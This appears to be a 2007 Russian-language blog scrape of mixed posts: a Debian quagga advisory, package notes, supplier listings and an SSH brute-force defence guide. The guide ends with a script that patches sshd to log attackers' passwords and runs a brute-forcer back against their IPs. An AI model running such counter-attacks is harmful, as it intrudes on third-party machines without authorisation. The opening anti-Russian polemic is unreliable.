|
Пролог "В кровавом болоте московского рабства, а не в суровой славе норманской эпохи стоит колыбель России. Сменив имена и даты, увидим, что политика Ивана III и политика современной московской империи являются не просто похожими, а и тождественными...
Россия порождена и воспитана в противной и униженной школе монгольского рабства. Сильной она стала лишь потому, что в мастерстве рабства была непревзойденной. Даже и тогда, когда Россия стала независимой, она и далее осталась страной рабов. Петр I соединил политическую хитрость монгольского раба с величием монгольского владетеля, которому Чингисхан завещал покорить мир...
Политика России - неизменна. Русские методы и тактика менялись, и будут меняться, однако главная цель российской политики - покорить мир и править в нем - есть и будет неизменной. "Московский панславизм - всего лишь одна из форм захватничества". Карл Маркс |
|
Just checkout http://www.laptopvideo2go.com/ and download the latest driver. Don't forget to download their modded inf as well. After unpacking the driver, copy the modded inf into the installation directory and run setup.exe.
http://www.techpowerup.com/downloads/765g/163.71_forceware_winxp_32bit_english_whql.exe |
| » nonstop dance |
|---|
17 Окт, 2007 @ 13:27
|
| » Цыферъ |
|---|
16 Окт, 2007 @ 15:02
|
| » Virtual Hitman Design |
|---|
› TELEVISION RULES THE NATION
source vhm:
vhm at deviantart
14 Окт, 2007 @ 18:17
|
| » Sand Storm in Iraq |
|---|
Кликабельно
14 Окт, 2007 @ 16:55
|
| » wondershaper |
|---|
Package: wondershaper (1.1a-4ubuntu1) [universe]
Easy to use traffic shaping script
An easy to use traffic shaping script that provides these improvements:
* Low latency for interactive traffic (and pings) at all times
* Allow websurfing at reasonable speeds while uploading / downloading
* Make sure uploads don't hurt downloads
* Make sure downloads don't hurt uploads
It does this by:
* Limiting upload speed slightly, to eliminate queues
* Limiting download speed, while allowing bursts, to eliminate queues
* Interactive traffic skips the queue
* ACKs and tiny packets skip the queue
Configuring the wondershaper requires you to accurately and precisely determine your consistent upload and download speeds.
The wondershaper is the simplest, easiest to use, entry level, traffic shaping script provided by Debian.
After installing this package, read highly the detailed instructions: /usr/share/doc/wondershaper/README.Debian
Other Packages Related to wondershaper
6 Окт, 2007 @ 21:48
|
| » Quagga |
|---|
- ------------------------------------------------------------------------
Debian Security Advisory DSA 1379-1 security@debian.org
http://www.debian.org/security/ Florian Weimer
October 1st, 2007 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : quagga
Vulnerability : null pointer dereference
Problem type : remote
Debian-specific: no
CVE ID : CVE-2007-4826
Debian Bug : 442133
It was discovered that BGP peers can trigger a NULL pointer dereference
in the BGP daemon if debug logging is enabled, causing the BGP daemon to
crash.
For the old stable distribution (sarge), this problem has been fixed in
version 0.98.3-7.5.
For the stable distribution (etch), this problem has been fixed in
version 0.99.5-5etch3.
For the unstable distribution (sid), this problem has been fixed in
version 0.99.9-1.
We recommend that you upgrade your quagga packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3.orig.tar.gz
Size/MD5 checksum: 2118348 68be5e911e4d604c0f5959338263356e
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5.diff.gz
Size/MD5 checksum: 43910 8bfd06c851172358137d7b67d5f90490
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5.dsc
Size/MD5 checksum: 1017 69dc4e5de4de00ec723ecaad6f285af8
Architecture independent packages:
http://security.debian.org/pool/updates/main/q/quagga/quagga-doc_0.98.3-7.5_all.deb
Size/MD5 checksum: 488996 4f150df3d0d7c1b26d648590ac02541a
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_alpha.deb
Size/MD5 checksum: 1613894 c0064c06d8eeed92b7607bc9d1c03c0f
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_amd64.deb
Size/MD5 checksum: 1413484 399d4fe967343eb586eb4f17348d2f4b
arm architecture (ARM)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_arm.deb
Size/MD5 checksum: 1291326 cc876fbb2cf8e3602cde4ea1e93e75e0
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_hppa.deb
Size/MD5 checksum: 1447854 ae9502f1d97de52c875f0eb82ab8cf3e
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_i386.deb
Size/MD5 checksum: 1192432 e3057ed965a580381e7c15dc430df295
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_ia64.deb
Size/MD5 checksum: 1829272 e182c3ae76fe84b9b041498aef8807ee
m68k architecture (Motorola Mc680x0)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_m68k.deb
Size/MD5 checksum: 1159818 487dd9883427b87d886674996e6850a1
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_mips.deb
Size/MD5 checksum: 1353182 411564875b0ecb39ffd166865392ed7b
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_mipsel.deb
Size/MD5 checksum: 1356062 b828e6228e2b8389d61de6b97c1b6b56
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_powerpc.deb
Size/MD5 checksum: 1317460 927a1768a1e2449981c0159d974658e8
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_s390.deb
Size/MD5 checksum: 1401842 e30e4afa3570324cb913ae0b746f49a3
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.98.3-7.5_sparc.deb
Size/MD5 checksum: 1287860 17ad533f4dfc7b184812ad7634bf215f
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Source archives:
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5.orig.tar.gz
Size/MD5 checksum: 2311140 3f9c71aca6faa22a889e2f84ecfd0076
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3.dsc
Size/MD5 checksum: 1046 3a36e812322157de715626cbe04c519f
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3.diff.gz
Size/MD5 checksum: 33551 0de3c5021dbed0e4739f88b6f00a9c59
Architecture independent packages:
http://security.debian.org/pool/updates/main/q/quagga/quagga-doc_0.99.5-5etch3_all.deb
Size/MD5 checksum: 720288 2bafee611f8a75fedc07be2224f90922
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_alpha.deb
Size/MD5 checksum: 1681786 b98d10ce3b2906b13031f9d09fcdde3c
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_amd64.deb
Size/MD5 checksum: 1414716 00846f88e7df3db61001d54fd5647d23
arm architecture (ARM)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_arm.deb
Size/MD5 checksum: 1349946 5e8c58f59352222caf345fbf3f1551de
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_hppa.deb
Size/MD5 checksum: 1531350 54a89d669ab617597c7abf53eb7c3e6a
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_i386.deb
Size/MD5 checksum: 1247076 6334fa5dd1344e6be4bfe77d8f5efba7
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_ia64.deb
Size/MD5 checksum: 1955634 6b98821ad60bd0a757b274488f92a50d
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_mips.deb
Size/MD5 checksum: 1455714 1b8e171cb0b8dd1d5643f4960fb227de
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_mipsel.deb
Size/MD5 checksum: 1460804 4bbd130c9419f69f6c759c80ec672352
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_powerpc.deb
Size/MD5 checksum: 1379640 a0c25edb50d2b0c3ddbcacf96a702b29
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_s390.deb
Size/MD5 checksum: 1482930 e22c407cb6fdf8071799d3891de4c12c
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.5-5etch3_sparc.deb
Size/MD5 checksum: 1348064 843f3b9bcfc7f25f1fe096a0c0f46793
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
6 Окт, 2007 @ 21:45
|
| » SSH vs Script Kiddies How-to Guide |
|---|
Scope
Some idiot created a SSH worm that uses a dictionary attack to try to log into a computer over port 22. The worm tries to set up shop on your computer and tries to find the next vulnerable computer. This clogs up networks with bazillions of SSH login attempts.
A number of people created scripts that scan the system log files to identify the IP address of attackers and block them either using TcpWrappers or Netfilter. The problem with these approaches is that it consumes local computer resources. It also creates the risk that you can lock yourself out accidentally - maybe not a problem if the computer is in the next room, but it is a serious concern if the computer is far away on the other side of the globe.
Another solution is to set SSHD to use a different port. This will work, till the attacker adds a port scanner to his worm.
What is needed is a simple solution that consumes the resources of the attacker instead of your own. This little guide shows how to slow down SSH password authentication to accomplish this in a single line of code. This simple modification has been proven to completely defeat the attack, as discussed below.
Get It
You can get the SSH source code from the project pages at http://www.openssh.org. Download and store it somewhere, then make a small one line change and compile.
First we have to ensure that it will in fact compile and sort out any missing dependencies:
$ tar -zxvf open[tab]
$ cd open[tab]
$ ./configure --prefix=/usr --sysconfdir=/etc/ssh
$ make
If you are running Mandriva, then you should not have any issues, but SSH depends on the SSL library, so you have to do a test compile and fix any issues that crop up.
Hack It
The solution is to slow down password logins, but not affect public key logins. This way, if you are using public keys, login is immediate, while if someone uses password logins, he would have to wait a few seconds. This is not a problem to a person hammering away at the keyboard, but it will slow down an automated dictionary attack enormously.
Edit the file auth-passwd.c and add the single line 'sleep(10);' to it, immediately after the variable definitions:
int
auth_password(Authctxt *authctxt, const char *password)
{
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
static int expire_checked = 0;
#endif
/* Password authentication delay */
sleep(10);
The sleep() function allows the system to schedule other activity and come back a few seconds later. Therefore, this is an efficient way to waste someone else's time.
Now recompile and install, then restart sshd and test the new super slow password login:
$ make
$ su
password
# make install
# service sshd restart
# exit
$ ssh localhost
password
...long time passes...
Now you are the proud operator of an official Skr1pt K1dd13 T0rtur3 Mach1n3...
Compile Problems
If you have an older system and you have multiple versions of SSL installed, then compiling SSH may be a rather traumatic experience. I wanted to implement my fix on a Red Hat machine and had to spend a couple hours hacking away at it before it configured and compiled:
#! /bin/bash
# SSHD Compile and Install is just a wee bit problematic.
# The following overrides for OpenSSL gets it going.
# GCC says that the -R option is not recognized,
# so I guess you can leave that out.
# Anyhoo, this works...
LDFLAGS="-I/usr/local/ssl/include -L/usr/local/ssl/lib -R/usr/local/ssl/lib"
export LDFLAGS
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-ssl-dir=/usr/local/ssl
make
make install
Clearly, the trick is to play around with the various paths defined above, till you get it to work. Some trial and terror...
Results
The big question is of course: Does it work? It sure does.
Before the implementation of this simple one liner, a server could slow down to a crawl while it gets tens of thousands of login attempts, two or three times a day. Now it still gets two or three attacks a day, but the attackers give up after only eight attempts.
# tail -n 10000 /var/log/secure | grep "password"
Sep 7 12:05:34 ns sshd[13324]: Failed password for invalid user lpd
from 61.17.77.2 port 60882 ssh2
Sep 7 12:05:34 ns sshd[13322]: Failed password for invalid user lpd
from 61.17.77.2 port 60811 ssh2
Sep 7 12:05:34 ns sshd[13326]: Failed password for invalid user lpd
from 61.17.77.2 port 60889 ssh2
Sep 7 12:05:35 ns sshd[13328]: Failed password for invalid user lpd
from 61.17.77.2 port 60893 ssh2
Sep 7 12:05:35 ns sshd[13327]: Failed password for invalid user lpd
from 61.17.77.2 port 60890 ssh2
Sep 7 12:05:36 ns sshd[13329]: Failed password for invalid user lpd
from 61.17.77.2 port 60894 ssh2
Sep 7 12:05:37 ns sshd[13334]: Failed password for invalid user lpd
from 61.17.77.2 port 60881 ssh2
Sep 7 12:05:38 ns sshd[13336]: Failed password for invalid user lpd
from 61.17.77.2 port 60896 ssh2
Sep 7 15:05:46 ns sshd[14117]: Failed password for invalid user a
from 211.219.20.245 port 1931 ssh2
Sep 7 15:05:55 ns sshd[14119]: Failed password for invalid user a
from 211.219.20.245 port 2371 ssh2
Sep 7 15:06:06 ns sshd[14121]: Failed password for invalid user a
from 211.219.20.245 port 2805 ssh2
Sep 7 15:06:15 ns sshd[14123]: Failed password for invalid user a
from 211.219.20.245 port 3255 ssh2
Sep 7 15:06:23 ns sshd[14125]: Failed password for invalid user a
from 211.219.20.245 port 3573 ssh2
Sep 7 15:06:26 ns sshd[14127]: Failed password for invalid user a
from 211.219.20.245 port 3692 ssh2
Sep 7 15:06:33 ns sshd[14129]: Failed password for invalid user a
from 211.219.20.245 port 4011 ssh2
Sep 7 15:06:36 ns sshd[14131]: Failed password for invalid user a
from 211.219.20.245 port 4137 ssh2
These dictionary attacks are really lame, starting at 'a' for 'absolutely retarded', yet they do find servers to infect, showing just how many retarded sysadmins there are in the world...
The moral of the story? Use long user names and random passwords, or loooooong passphrases like 'ohmygodtheykilledkenny12345' or some such.
In general, throttling of network services is a very good way to limit abuse. A simple sleep delay added to any online form submission will prevent abuse, while regular users won't notice anything.
Analysis of the Attack Program
I have subsequently obtained copies of three of these attack scripts. I had to do some debugging to get them to work, but they all depend on libssh and all suffer from the same problems. Essentially, you feed the program an IP address, a list of usernames and passwords and let it go. It then does a complete permutation of the two lists.
One of the scripts is multi threaded, but libssh fails when more than eight threads are enabled. This explains why all attacks come in clumps of eight, since that is the highest number of threads that libssh can run.
It appears that the login timeout is hard coded in libssh and the 10 second sleep() that I have introduced causes libssh to fail on every login attempt. Therefore, this modification is very good and completely defeats the attack.
Other Configuration Improvements
The /etc/ssh/sshd_config file has a number of features that you can use for further protection. First of all, you could disallow all password logins and only rely on public keys, but make sure the public key login works, before disabling password login. You could also set a list of user names that are allowed to use ssh, thereby disallowing all common users, who may have bad quality passwords. Here are a few configuration items to think about:
Port 2222
Protocol 2
PermitRootLogin no
AllowUsers herman webmaster joesoap johndoe
PasswordAuthentication no
Note that you can specify multiple ports and make sure that the new port works through the firewall, before you disable the default port:
Port 22
Port 2222
Change these things with care, since you can lock yourself out!
Turning the Table
This attack is guaranteed to be one on one. Therefore, it is easy to run sshd in debug mode and capture the attacking IP, Username and Password, then do a reverse attack on the originator. As it is very likely that the same script and attack vectors used against you, were also used to subvert the attacking machine, a reversal will eventually yield the login data of the attacker:
#! /bin/bash
# SSH Honeypot
# This script reverses a SSH brute force attack onto the attacker.
# The counter attack uses the same brute force script that the
# attacker is running.
# Assuming that the same data set was used to compromise the attacking
# host, this will eventually yield the username and password of
# the attacking host.
# Modifications required to SSHD:
# We need to make a small modification to SSHD to cause it to
# reveal the password when running in debug mode.
# Add the following line to auth-passwd.c, procedure auth_password():
# debug("auth-passwd.c: Password %s ", password);
# then recompile SSHD.
# Forever
while [ 1 -eq 1 ]
do
# Run SSHD in debug mode, single threaded
data=`/usr/sbin/sshd -dDe 2>&1 | grep -A 2 "debug1: attempt 3"`
# The $data looks like this:
# data=$'debug1: attempt 3 failures 3\r\n
# debug1: auth-passwd.c: Password hello \r\n
# Failed password for root from 127.0.0.1 port 4199 ssh2\r'
# Parse the string for the three parameters
# The brute forcer wants some of these in files
# so we echo them to files.
pass=`echo $data | cut -d " " -f 9`
echo $pass > pass
user=`echo $data | cut -d " " -f 14`
echo $user > user
ip=`echo $data | cut -d " " -f 16`
echo $ip > ip
# Reverse the attack
./ssh2_brute -h $ip -u user -p pass -c 1
# Check the result
if [ $? -eq 1 ]
then
echo "ATTACKER FOUND:"
echo IP=$ip, Username=$user, Password=$pass
echo $ip $user $pass >> attackers
fi
done
exit 0
Use IPTables to Limit Access
Instead of recompiling SSH, you can use the IPTables rate limit module to prevent abuse. Add the following lines to the bottom of /etc/rc.d/rc.local, to limit new login attempts to once per minute:
iptables -A INPUT -p tcp -m state --syn --state NEW --dport ssh \
-m limit --limit 1/minute --limit-burst 1 -j ACCEPT
iptables -A INPUT -p tcp -m state --syn --state NEW --dport ssh -j DROP
That will defeat even the most patient hacker...
La Voila!
1 Окт, 2007 @ 12:34
|
| » (No Subject) |
|---|
Welcome to Finnix for User Mode Linux!
[*] Running Linux kernel 2.6.14.2-finnix86.1-linode1 on i686
[*] Host: Linux host11.linode.com 2.6.11-1-bigmem64 #2 SMP Mon Mar 7 15:00:57 EST 2005 i686
[*] Scanning for partitions and creating /etc/fstab... done
[*] Using swap partition /dev/ubdb
[*] Starting background DHCP request... eth0
[*] Finnix version 86.1 ready; 346 packages available
INIT: Entering runlevel: 2
root@tty0:~#
21 Сент, 2007 @ 18:11
|
| » (No Subject) |
|---|
Домино-С, ЧП
Город: Львов
Адрес: ул.Тургенева, 73
Телефон: 8/032/ 239-30-10, 8/050/ 43-00-828
E-mail:
domino-lviv mail.ru
Отправить письмо
www: www.domino-s.com.ua
Статус: поставщик комплектующих
Комплектующие:
* комплектующие (1. Набір для усунення пошкоджень на білому профілі ПВХ.2. Професійний набір для усунення пошкоджень на дерев`яному профілі та ПВХ (по кольорам Ral, Renolit).3. Фломастери “Kanten Fix” ( колір Ral, Renolit ) для забарвлення стиків, швів та ін.)
* средства для ремонта и восстановления поверхностей ( Наша фирма предлагает Вам профессиональные средства немецкой фирмы «Heinrich Konig & Co» по устранению повреждений на деревянных профилях и ПВХ . А также фломастеры и краски для швов на профилях ПВХ по цветам Renolit, RAL.)
Китайский Торговый Дом, ООО
Город: Киев
Адрес: Бизнес-центр 'Рент Хаус',ул.Голосеевская,7,корп.2,оф.6/1
Телефон: 8044-251-45-08,8044-251-45-07
E-mail:
grn ukr-china.com
Отправить письмо
www: www.china-tradehouse.com
Статус: поставщик комплектующих
Комплектующие:
*
* фурнитура/ручки (аллюминиевая и коричневая, восьмипозиционная, белая, штифт 35 и 40 мм. Стоимость от 3,38 грн)
* стеклопакеты/стекло (флоат-стекло М0, размер 3210х2134х4 мм, размер 2600х1800х4 мм, гарантия качества, великолепно режется, стоимость от 15 грн (с НДС))
САДЕКС, ООО
Город: Киев
Адрес: ул.Пшеничная,18
Телефон: (044) 501 40 16
E-mail:
infosadex gmail.com
Отправить письмо
www: не указан
Статус: поставщик комплектующих
Комплектующие:
* фурнитура/ручки (ручки оконные алюминевые (бел,кор) пр-во Китай)
* монтаж/пена (пена монтажная профессиональная (пр-во Польша))
* комплектующие/откосы (наличник пластиковый самоклеющийся (пр-во Германия))
21 Сент, 2007 @ 18:02
|
| » 28082007(019) |
|---|
28 Авг, 2007 @ 19:20
|
| » Postfix SSL HOWTO |
|---|
|
Postfix SSL HOWTO
This is an introduction to the use of TLS/SSL with the Postfix MTA. Using TLS can provide the user with a
means to encrypt the mail connection, to encrypt plaintext authentication. Using TLS, you can also
authenticate a user based on a private key to allow mail relaying.
27 Май, 2007 @ 22:24
|
|
